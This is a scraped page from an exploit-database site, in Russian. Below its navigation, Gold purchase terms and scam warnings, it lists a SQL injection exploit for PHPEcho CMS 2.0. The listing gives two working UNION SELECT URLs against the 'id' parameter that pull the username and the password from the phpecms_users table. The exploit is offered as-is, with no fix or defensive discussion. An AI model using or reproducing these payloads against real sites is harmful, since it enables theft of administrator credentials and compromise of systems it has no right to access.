0day.today - наибольшая база данных эксплоитов в мире.
![](/img/logo_green.jpg)
Мы используем один основной домен 0day.today
Если Вы желаете приобрести эксплоит или заплатить за услуги - Вам необходимо приобрести Золото (Gold). Мы не хотим чтобы Вы использовали наш сайт как инструмент для взломов, поэтому любые действия, которые могут незаконно влиять на других пользователей или на сайты, к которым у Вас нет прав доступа будут запрещены и Ваш профиль со всей вложенной информацией будет уничтожен.
Администрация сайта использует официальные контакты. Опасайтесь обманщиков!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Прочитайте [ соглашение ]
- Прочитайте [ Отправить ] правила
- Посетите страницу [ faq ] page
- [ Зарегистрируйте ] профиль
- Получите [ Gold ]
- Если Вы хотите [ продать ]
- Если Вы хотите [ купить ]
- Если Вы потеряли [ Счет ]
- Любые вопросы [ [email protected] ]
- Страница авторизации
- Страница регистрации
- Страница восстановления
- Страница FAQ
- Страница контактов
- Правила публикации
- Страница с соглашением
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Вы можете связаться с нами по:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PHPEcho CMS 2.0 (id) Remote SQL Injection Vulnerability
Автор
Риск
![](/img/risk/critlow_0.gif)
Security Risk Unsored
]0day-ID
Категория
Дата добавления
Платформа
======================================================= PHPEcho CMS 2.0 (id) Remote SQL Injection Vulnerability ======================================================= ######################################################################### PHPEcho CMS Remote SQL Injection Exploit ######################################################################### ## Product: PHPEchoCM ## License: GPL ## For version: 2.0 ## AUTHOR : Stack-Terrorist [ v40] ## HOME : http://v4-team.com ## EXPLOITS : username : http://server.com/Path/index.php?module=forum&show=section&id=-1%20union%20select%201,username,3,4%20from%20phpecms_users%20where%20id=1/* password : http://server.com/Path/index.php?module=forum&show=section&id=-1%20union%20select%201,password,3,4%20from%20phpecms_users%20where%20id=1/* ## GREETZ : All members v4 Team & no-hack & tryag & soqor ######################################################################### PHPEcho CMS Remote SQL Injection Exploit ######################################################################### # 0day.today [2024-07-04] #